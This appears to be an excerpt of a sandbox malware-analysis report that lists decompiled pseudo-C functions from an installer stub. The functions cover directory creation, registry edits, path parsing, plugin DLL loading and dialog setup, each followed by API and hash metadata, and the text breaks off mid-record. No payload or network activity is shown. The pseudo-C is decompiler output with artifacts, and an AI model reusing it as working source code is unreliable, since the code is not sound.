                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                  • Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
                                                  • Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                  • Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004054A9(CHAR* _a4) {
                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                  				long _t23;
                                                  
                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                  				_v36.Owner = 0x407310;
                                                  				_v36.Group = 0x407310;
                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                  				_v36.Revision = 1;
                                                  				_v36.Control = 4;
                                                  				_v36.Dacl = 0x407300;
                                                  				_v16.nLength = 0xc;
                                                  				if(CreateDirectoryA(_a4,  &_v16) != 0) {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  				_t23 = GetLastError();
                                                  				if(_t23 == 0xb7) {
                                                  					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                  						goto L1;
                                                  					}
                                                  					return GetLastError();
                                                  				}
                                                  				return _t23;
                                                  			}







                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
                                                  • GetLastError.KERNEL32 ref: 00405500
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
                                                  • GetLastError.KERNEL32 ref: 0040551F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 3449924974-224404859
                                                  • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                  • Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
                                                  • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                  • Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
                                                  				void* _v8;
                                                  				char _v272;
                                                  				long _t18;
                                                  				intOrPtr* _t27;
                                                  				long _t28;
                                                  
                                                  				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
                                                  				if(_t18 == 0) {
                                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                  						if(_a12 != 0) {
                                                  							RegCloseKey(_v8);
                                                  							L8:
                                                  							return 1;
                                                  						}
                                                  						if(E00402A4C(_v8,  &_v272, 0) != 0) {
                                                  							break;
                                                  						}
                                                  					}
                                                  					RegCloseKey(_v8);
                                                  					_t27 = E00406087(4);
                                                  					if(_t27 == 0) {
                                                  						if( *0x424030 != 0) {
                                                  							goto L8;
                                                  						}
                                                  						_t28 = RegDeleteKeyA(_a4, _a8);
                                                  						if(_t28 != 0) {
                                                  							goto L8;
                                                  						}
                                                  						return _t28;
                                                  					}
                                                  					return  *_t27(_a4, _a8,  *0x424030, 0);
                                                  				}
                                                  				return _t18;
                                                  			}









                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                  • Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
                                                  • Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                  • Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00401CC1(int __edx) {
                                                  				void* _t17;
                                                  				struct HINSTANCE__* _t21;
                                                  				struct HWND__* _t25;
                                                  				void* _t27;
                                                  
                                                  				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                  				GetClientRect(_t25, _t27 - 0x50);
                                                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                  				if(_t17 != _t21) {
                                                  					DeleteObject(_t17);
                                                  				}
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
                                                  				return 0;
                                                  			}








                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00401CC5
                                                  • GetClientRect.USER32 ref: 00401CD2
                                                  • LoadImageA.USER32 ref: 00401CF3
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                  • DeleteObject.GDI32(00000000), ref: 00401D10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                  • Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
                                                  • Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                  • Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405882(char _a4) {
                                                  				CHAR* _t3;
                                                  				char* _t5;
                                                  				CHAR* _t7;
                                                  				CHAR* _t8;
                                                  				void* _t10;
                                                  
                                                  				_t1 =  &_a4; // 0x405634
                                                  				_t8 =  *_t1;
                                                  				_t7 = CharNextA(_t8);
                                                  				_t3 = CharNextA(_t7);
                                                  				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                  					if( *_t8 != 0x5c5c) {
                                                  						L8:
                                                  						return 0;
                                                  					}
                                                  					_t10 = 2;
                                                  					while(1) {
                                                  						_t10 = _t10 - 1;
                                                  						_t5 = E00405819(_t3, 0x5c);
                                                  						if( *_t5 == 0) {
                                                  							goto L8;
                                                  						}
                                                  						_t3 = _t5 + 1;
                                                  						if(_t10 != 0) {
                                                  							continue;
                                                  						}
                                                  						return _t3;
                                                  					}
                                                  					goto L8;
                                                  				} else {
                                                  					return CharNextA(_t3);
                                                  				}
                                                  			}









                                                  APIs
                                                  • CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                                                  • CharNextA.USER32(00000000), ref: 00405895
                                                  • CharNextA.USER32(00000000), ref: 004058A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: 4V@$C:\
                                                  • API String ID: 3213498283-1503405514
                                                  • Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                  • Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
                                                  • Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                  • Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                  				char _v36;
                                                  				char _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t21;
                                                  				signed int _t22;
                                                  				void* _t29;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				void* _t41;
                                                  				signed int _t43;
                                                  				signed int _t47;
                                                  				signed int _t50;
                                                  				signed int _t51;
                                                  				signed int _t53;
                                                  
                                                  				_t21 = _a16;
                                                  				_t51 = _a12;
                                                  				_t41 = 0xffffffdc;
                                                  				if(_t21 == 0) {
                                                  					_push(0x14);
                                                  					_pop(0);
                                                  					_t22 = _t51;
                                                  					if(_t51 < 0x100000) {
                                                  						_push(0xa);
                                                  						_pop(0);
                                                  						_t41 = 0xffffffdd;
                                                  					}
                                                  					if(_t51 < 0x400) {
                                                  						_t41 = 0xffffffde;
                                                  					}
                                                  					if(_t51 < 0xffff3333) {
                                                  						_t50 = 0x14;
                                                  						asm("cdq");
                                                  						_t22 = 1 / _t50 + _t51;
                                                  					}
                                                  					_t23 = _t22 & 0x00ffffff;
                                                  					_t53 = _t22 >> 0;
                                                  					_t43 = 0xa;
                                                  					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                  				} else {
                                                  					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                  					_t47 = 0;
                                                  				}
                                                  				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                  				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
                                                  				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
                                                  				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                  				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
                                                  			}




















                                                  APIs
                                                  • lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                  • wsprintfA.USER32 ref: 00404852
                                                  • SetDlgItemTextA.USER32 ref: 00404865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                  • Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
                                                  • Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                  • Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                  			E00401BAD() {
                                                  				signed int _t28;
                                                  				CHAR* _t31;
                                                  				long _t32;
                                                  				int _t37;
                                                  				signed int _t38;
                                                  				int _t42;
                                                  				int _t48;
                                                  				struct HWND__* _t52;
                                                  				void* _t55;
                                                  
                                                  				 *(_t55 - 8) = E004029EF(3);
                                                  				 *(_t55 + 8) = E004029EF(4);
                                                  				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                  					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
                                                  				}
                                                  				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                  				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                  					 *(_t55 + 8) = E00402A0C(0x44);
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                  				_push(1);
                                                  				if(__eflags != 0) {
                                                  					_t50 = E00402A0C();
                                                  					_t28 = E00402A0C();
                                                  					asm("sbb ecx, ecx");
                                                  					asm("sbb eax, eax");
                                                  					_t31 =  ~( *_t27) & _t50;
                                                  					__eflags = _t31;
                                                  					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                  					goto L10;
                                                  				} else {
                                                  					_t52 = E004029EF();
                                                  					_t37 = E004029EF();
                                                  					_t48 =  *(_t55 - 0x14) >> 2;
                                                  					if(__eflags == 0) {
                                                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                  						L10:
                                                  						 *(_t55 - 0xc) = _t32;
                                                  					} else {
                                                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                  						asm("sbb eax, eax");
                                                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                  					}
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                  				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                  					_push( *(_t55 - 0xc));
                                                  					E00405C59();
                                                  				}
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
                                                  				return 0;
                                                  			}













                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                  • Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
                                                  • Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                  • Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004057EE(CHAR* _a4) {
                                                  				CHAR* _t7;
                                                  
                                                  				_t7 = _a4;
                                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                  					lstrcatA(_t7, 0x409010);
                                                  				}
                                                  				return _t7;
                                                  			}





                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
                                                  • lstrcatA.KERNEL32(?,00409010), ref: 0040580E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                  • Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
                                                  • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                  • Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E00401F67(void* __ebx, void* __eflags) {
                                                  				void* _t27;
                                                  				struct HINSTANCE__* _t30;
                                                  				CHAR* _t32;
                                                  				intOrPtr* _t33;
                                                  				void* _t34;
                                                  
                                                  				_t27 = __ebx;
                                                  				asm("sbb eax, 0x424038");
                                                  				 *(_t34 - 4) = 1;
                                                  				if(__eflags < 0) {
                                                  					_push(0xffffffe7);
                                                  					L15:
                                                  					E00401423();
                                                  					L16:
                                                  					 *0x424008 =  *0x424008 +  *(_t34 - 4);
                                                  					return 0;
                                                  				}
                                                  				_t32 = E00402A0C(0xfffffff0);
                                                  				 *(_t34 + 8) = E00402A0C(1);
                                                  				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                  					L3:
                                                  					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                  					if(_t30 == _t27) {
                                                  						_push(0xfffffff6);
                                                  						goto L15;
                                                  					}
                                                  					L4:
                                                  					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                  					if(_t33 == _t27) {
                                                  						E00404FE7(0xfffffff7,  *(_t34 + 8));
                                                  					} else {
                                                  						 *(_t34 - 4) = _t27;
                                                  						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                  							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
                                                  						} else {
                                                  							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                  							if( *_t33() != 0) {
                                                  								 *(_t34 - 4) = 1;
                                                  							}
                                                  						}
                                                  					}
                                                  					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
                                                  						FreeLibrary(_t30);
                                                  					}
                                                  					goto L16;
                                                  				}
                                                  				_t30 = GetModuleHandleA(_t32);
                                                  				if(_t30 != __ebx) {
                                                  					goto L4;
                                                  				}
                                                  				goto L3;
                                                  			}









                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                  • Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
                                                  • Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                  • Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00402319(void* __eax) {
                                                  				void* _t15;
                                                  				char* _t18;
                                                  				int _t19;
                                                  				char _t24;
                                                  				int _t27;
                                                  				intOrPtr _t35;
                                                  				void* _t37;
                                                  
                                                  				_t15 = E00402B01(__eax);
                                                  				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                  				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                  				 *(_t37 - 0x38) = E00402A0C(2);
                                                  				_t18 = E00402A0C(0x11);
                                                  				_t31 =  *0x424030 | 0x00000002;
                                                  				 *(_t37 - 4) = 1;
                                                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
                                                  				if(_t19 == 0) {
                                                  					if(_t35 == 1) {
                                                  						E00402A0C(0x23);
                                                  						_t19 = lstrlenA(0x40a450) + 1;
                                                  					}
                                                  					if(_t35 == 4) {
                                                  						_t24 = E004029EF(3);
                                                  						 *0x40a450 = _t24;
                                                  						_t19 = _t35;
                                                  					}
                                                  					if(_t35 == 3) {
                                                  						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
                                                  					}
                                                  					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
                                                  						 *(_t37 - 4) = _t27;
                                                  					}
                                                  					_push( *(_t37 + 8));
                                                  					RegCloseKey();
                                                  				}
                                                  				 *0x424008 =  *0x424008 +  *(_t37 - 4);
                                                  				return 0;
                                                  			}











                                                  APIs
                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                                                  • lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                  • Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
                                                  • Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                  • Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E00401D1B() {
                                                  				void* __esi;
                                                  				int _t6;
                                                  				signed char _t11;
                                                  				struct HFONT__* _t14;
                                                  				void* _t18;
                                                  				void* _t24;
                                                  				void* _t26;
                                                  				void* _t28;
                                                  
                                                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                  				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
                                                  				 *0x40b064 = E004029EF(3);
                                                  				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                                  				 *0x40b06b = 1;
                                                  				 *0x40b068 = _t11 & 0x00000001;
                                                  				 *0x40b069 = _t11 & 0x00000002;
                                                  				 *0x40b06a = _t11 & 0x00000004;
                                                  				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
                                                  				_t14 = CreateFontIndirectA(0x40b054);
                                                  				_push(_t14);
                                                  				_push(_t26);
                                                  				E00405C59();
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
                                                  				return 0;
                                                  			}












                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D22
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
